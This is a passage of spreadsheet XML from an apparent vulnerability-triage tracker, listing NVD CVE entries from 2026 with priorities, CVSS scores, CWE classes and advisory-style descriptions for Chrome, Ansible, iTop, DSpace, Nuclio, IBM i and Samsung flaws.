        </is>
      </c>
      <c r="F383" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G383" s="5" t="inlineStr"/>
      <c r="H383" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I383" s="5" t="inlineStr"/>
      <c r="J383" s="5" t="inlineStr"/>
      <c r="K383" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L383" s="5" t="inlineStr"/>
      <c r="M383" s="5" t="inlineStr"/>
      <c r="N383" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O383" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P383" s="5" t="inlineStr"/>
      <c r="Q383" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="R383" s="5" t="inlineStr">
        <is>
          <t>Uncontrolled search path element in CredentialProvider in Google Chrome on on Windows prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via a local program. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87530</t>
        </is>
      </c>
    </row>
    <row r="384">
      <c r="A384" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B384" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87533</t>
        </is>
      </c>
      <c r="D384" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E384" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F384" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G384" s="5" t="inlineStr"/>
      <c r="H384" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I384" s="5" t="inlineStr"/>
      <c r="J384" s="5" t="inlineStr"/>
      <c r="K384" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L384" s="5" t="inlineStr"/>
      <c r="M384" s="5" t="inlineStr"/>
      <c r="N384" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O384" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P384" s="5" t="inlineStr"/>
      <c r="Q384" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R384" s="5" t="inlineStr">
        <is>
          <t>Use after free in DevTools in Google Chrome prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via a local program. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87533</t>
        </is>
      </c>
    </row>
    <row r="385">
      <c r="A385" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B385" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87537</t>
        </is>
      </c>
      <c r="D385" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E385" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F385" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G385" s="5" t="inlineStr"/>
      <c r="H385" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I385" s="5" t="inlineStr"/>
      <c r="J385" s="5" t="inlineStr"/>
      <c r="K385" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L385" s="5" t="inlineStr"/>
      <c r="M385" s="5" t="inlineStr"/>
      <c r="N385" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O385" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P385" s="5" t="inlineStr"/>
      <c r="Q385" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R385" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Extensions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87537</t>
        </is>
      </c>
    </row>
    <row r="386">
      <c r="A386" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B386" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87554</t>
        </is>
      </c>
      <c r="D386" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E386" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F386" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G386" s="5" t="inlineStr"/>
      <c r="H386" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I386" s="5" t="inlineStr"/>
      <c r="J386" s="5" t="inlineStr"/>
      <c r="K386" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L386" s="5" t="inlineStr"/>
      <c r="M386" s="5" t="inlineStr"/>
      <c r="N386" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O386" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P386" s="5" t="inlineStr"/>
      <c r="Q386" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="R386" s="5" t="inlineStr">
        <is>
          <t>Race condition in Chromoting in Google Chrome on on Windows prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via a local program. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87554</t>
        </is>
      </c>
    </row>
    <row r="387">
      <c r="A387" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B387" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87606</t>
        </is>
      </c>
      <c r="D387" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E387" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F387" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G387" s="5" t="inlineStr"/>
      <c r="H387" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I387" s="5" t="inlineStr"/>
      <c r="J387" s="5" t="inlineStr"/>
      <c r="K387" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L387" s="5" t="inlineStr"/>
      <c r="M387" s="5" t="inlineStr"/>
      <c r="N387" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O387" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P387" s="5" t="inlineStr"/>
      <c r="Q387" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R387" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in SiteIsolation in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87606</t>
        </is>
      </c>
    </row>
    <row r="388">
      <c r="A388" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B388" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87874</t>
        </is>
      </c>
      <c r="D388" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E388" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F388" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G388" s="5" t="inlineStr"/>
      <c r="H388" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I388" s="5" t="inlineStr"/>
      <c r="J388" s="5" t="inlineStr"/>
      <c r="K388" s="5" t="inlineStr"/>
      <c r="L388" s="5" t="inlineStr"/>
      <c r="M388" s="5" t="inlineStr"/>
      <c r="N388" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O388" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P388" s="5" t="inlineStr"/>
      <c r="Q388" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R388" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the memcached cache plugin of the community.general Ansible
collection. Although its documentation states that records are stored in JSON
format, the plugin performs no explicit serialization and relies on
python-memcached, which pickles values on write and unpickles them on read.
Because memcached is unauthenticated and cache keys are predictable, an attacker
able to reach a network-exposed or shared memcached instance can write a crafted
pickle payload that is deserialized and executed on the Ansible controller when
the poisoned fact cache is next read, leading to remote code execution.</t>
        </is>
      </c>
      <c r="S388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87874</t>
        </is>
      </c>
    </row>
    <row r="389">
      <c r="A389" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B389" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30826</t>
        </is>
      </c>
      <c r="D389" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E389" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F389" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G389" s="5" t="inlineStr"/>
      <c r="H389" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I389" s="5" t="inlineStr"/>
      <c r="J389" s="5" t="inlineStr"/>
      <c r="K389" s="5" t="inlineStr"/>
      <c r="L389" s="5" t="inlineStr"/>
      <c r="M389" s="5" t="inlineStr"/>
      <c r="N389" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O389" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P389" s="5" t="inlineStr"/>
      <c r="Q389" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R389" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, there is a Reflected Cross-Site Scripting (XSS) vulnerability in the testing OQL query functionality. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30826</t>
        </is>
      </c>
    </row>
    <row r="390">
      <c r="A390" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B390" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30890</t>
        </is>
      </c>
      <c r="D390" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E390" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F390" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G390" s="5" t="inlineStr"/>
      <c r="H390" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I390" s="5" t="inlineStr"/>
      <c r="J390" s="5" t="inlineStr"/>
      <c r="K390" s="5" t="inlineStr"/>
      <c r="L390" s="5" t="inlineStr"/>
      <c r="M390" s="5" t="inlineStr"/>
      <c r="N390" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O390" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P390" s="5" t="inlineStr"/>
      <c r="Q390" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R390" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, there is a Reflected Cross-Site Scripting (XSS) vulnerability in the synchro import script. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30890</t>
        </is>
      </c>
    </row>
    <row r="391">
      <c r="A391" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B391" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-31803</t>
        </is>
      </c>
      <c r="D391" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E391" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F391" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G391" s="5" t="inlineStr"/>
      <c r="H391" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I391" s="5" t="inlineStr"/>
      <c r="J391" s="5" t="inlineStr"/>
      <c r="K391" s="5" t="inlineStr"/>
      <c r="L391" s="5" t="inlineStr"/>
      <c r="M391" s="5" t="inlineStr"/>
      <c r="N391" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O391" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P391" s="5" t="inlineStr"/>
      <c r="Q391" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R391" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, 3.2.3, there is a Reflected Cross-Site Scripting (XSS) vulnerability in pages/tagadmin.php. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-31803</t>
        </is>
      </c>
    </row>
    <row r="392">
      <c r="A392" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B392" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-31880</t>
        </is>
      </c>
      <c r="D392" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E392" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F392" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G392" s="5" t="inlineStr"/>
      <c r="H392" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I392" s="5" t="inlineStr"/>
      <c r="J392" s="5" t="inlineStr"/>
      <c r="K392" s="5" t="inlineStr"/>
      <c r="L392" s="5" t="inlineStr"/>
      <c r="M392" s="5" t="inlineStr"/>
      <c r="N392" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O392" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P392" s="5" t="inlineStr"/>
      <c r="Q392" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R392" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, there is a Reflected Cross-Site Scripting (XSS) vulnerability in the universal search. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-31880</t>
        </is>
      </c>
    </row>
    <row r="393">
      <c r="A393" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B393" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C393" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49832</t>
        </is>
      </c>
      <c r="D393" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E393" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F393" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G393" s="5" t="inlineStr"/>
      <c r="H393" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I393" s="5" t="inlineStr"/>
      <c r="J393" s="5" t="inlineStr"/>
      <c r="K393" s="5" t="inlineStr"/>
      <c r="L393" s="5" t="inlineStr"/>
      <c r="M393" s="5" t="inlineStr"/>
      <c r="N393" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O393" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P393" s="5" t="inlineStr"/>
      <c r="Q393" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R393" s="5" t="inlineStr">
        <is>
          <t>DSpace open source software is a repository application which provides durable access to digital resources. From versions 8.0-rc1 to before 8.4, versions 9.0-rc1 to before 9.3, and version 10-rc1, Remote Code Execution (RCE) is possible via Velocity Templates used by DSpace for COAR Notify/LDN messages. This issue has been patched in versions 8.4, 9.3, and 10.0.</t>
        </is>
      </c>
      <c r="S393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49832</t>
        </is>
      </c>
    </row>
    <row r="394">
      <c r="A394" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B394" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52831</t>
        </is>
      </c>
      <c r="D394" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E394" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F394" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G394" s="5" t="inlineStr"/>
      <c r="H394" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I394" s="5" t="inlineStr"/>
      <c r="J394" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K394" s="5" t="inlineStr"/>
      <c r="L394" s="5" t="inlineStr"/>
      <c r="M394" s="5" t="inlineStr"/>
      <c r="N394" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O394" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P394" s="5" t="inlineStr"/>
      <c r="Q394" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R394" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. Prior to version 1.16.4, the Nuclio controller builds a curl invocation string for each cron trigger and stores it as the args of a Kubernetes CronJob container (/bin/sh, -c, &lt;command&gt;). Two fields in the trigger specification flow into this string without adequate sanitization: event.headers keys and event.body. This issue has been patched in version 1.16.4.</t>
        </is>
      </c>
      <c r="S394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52831</t>
        </is>
      </c>
    </row>
    <row r="395">
      <c r="A395" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B395" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C395" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52833</t>
        </is>
      </c>
      <c r="D395" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E395" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F395" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G395" s="5" t="inlineStr"/>
      <c r="H395" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I395" s="5" t="inlineStr"/>
      <c r="J395" s="5" t="inlineStr"/>
      <c r="K395" s="5" t="inlineStr"/>
      <c r="L395" s="5" t="inlineStr"/>
      <c r="M395" s="5" t="inlineStr"/>
      <c r="N395" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O395" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P395" s="5" t="inlineStr"/>
      <c r="Q395" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R395" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. Prior to version 1.16.5, Nuclio's Java runtime generates a build.gradle file during function builds using Go's text/template package. The template renders runtimeAttributes.repositories[] values with the {{ . }} action, which performs no escaping. An attacker can embed a closing brace (}) to break out of the repositories {} block and append arbitrary Groovy statements that execute unconditionally during the Gradle configuration phase. This issue has been patched in version 1.16.5.</t>
        </is>
      </c>
      <c r="S395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52833</t>
        </is>
      </c>
    </row>
    <row r="396">
      <c r="A396" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B396" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79755</t>
        </is>
      </c>
      <c r="D396" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E396" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F396" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G396" s="5" t="inlineStr"/>
      <c r="H396" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I396" s="5" t="inlineStr"/>
      <c r="J396" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K396" s="5" t="inlineStr"/>
      <c r="L396" s="5" t="inlineStr"/>
      <c r="M396" s="5" t="inlineStr"/>
      <c r="N396" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O396" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P396" s="5" t="inlineStr"/>
      <c r="Q396" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R396" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. Prior to version 1.17.4, on the Nuclio local Docker platform, the function namespace is interpolated—unvalidated—into a double-quoted docker ps --filter "label=nuclio.io/namespace=&lt;value&gt;" command that is executed via the host shell (/bin/sh -c). Because the default auth kind is nop (unauthenticated), a remote attacker can inject arbitrary OS commands that run as root inside the dashboard container, which holds the Docker socket → host compromise. This issue has been patched in version 1.17.4.</t>
        </is>
      </c>
      <c r="S396" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79755</t>
        </is>
      </c>
    </row>
    <row r="397">
      <c r="A397" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B397" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C397" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44629</t>
        </is>
      </c>
      <c r="D397" s="5" t="n">
        <v>7.9</v>
      </c>
      <c r="E397" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F397" s="5" t="inlineStr">
        <is>
          <t>security@genetec.com</t>
        </is>
      </c>
      <c r="G397" s="5" t="inlineStr"/>
      <c r="H397" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I397" s="5" t="inlineStr"/>
      <c r="J397" s="5" t="inlineStr"/>
      <c r="K397" s="5" t="inlineStr"/>
      <c r="L397" s="5" t="inlineStr"/>
      <c r="M397" s="5" t="inlineStr"/>
      <c r="N397" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O397" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P397" s="5" t="inlineStr"/>
      <c r="Q397" s="5" t="inlineStr">
        <is>
          <t>CWE-922</t>
        </is>
      </c>
      <c r="R397" s="5" t="inlineStr">
        <is>
          <t>Improper access control to the Synergis Softwire installation folder. This vulnerability affects Streamvault all-in-one appliances (SV-100E and SV-300E series) and Synergis Softwire installed on Windows servers.</t>
        </is>
      </c>
      <c r="S397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44629</t>
        </is>
      </c>
    </row>
    <row r="398">
      <c r="A398" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B398" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C398" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17499</t>
        </is>
      </c>
      <c r="D398" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E398" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F398" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G398" s="5" t="inlineStr"/>
      <c r="H398" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I398" s="5" t="inlineStr"/>
      <c r="J398" s="5" t="inlineStr"/>
      <c r="K398" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="L398" s="5" t="inlineStr"/>
      <c r="M398" s="5" t="inlineStr"/>
      <c r="N398" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O398" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P398" s="5" t="inlineStr"/>
      <c r="Q398" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R398" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a local attacker to execute arbitrary commands due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="S398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17499</t>
        </is>
      </c>
    </row>
    <row r="399">
      <c r="A399" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B399" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C399" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21087</t>
        </is>
      </c>
      <c r="D399" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E399" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F399" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G399" s="5" t="inlineStr"/>
      <c r="H399" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I399" s="5" t="inlineStr"/>
      <c r="J399" s="5" t="inlineStr"/>
      <c r="K399" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L399" s="5" t="inlineStr"/>
      <c r="M399" s="5" t="inlineStr"/>
      <c r="N399" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O399" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P399" s="5" t="inlineStr"/>
      <c r="Q399" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R399" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in libmdnie.so prior to SMR Sep-2026 Release 1 allows local attackers to execute arbitrary code with system server privilege.</t>
        </is>
      </c>
      <c r="S399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21087</t>
        </is>
      </c>
    </row>
    <row r="400">
      <c r="A400" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B400" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C400" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21088</t>
        </is>
      </c>
      <c r="D400" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E400" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F400" s="5" t="inlineStr">
        <is>
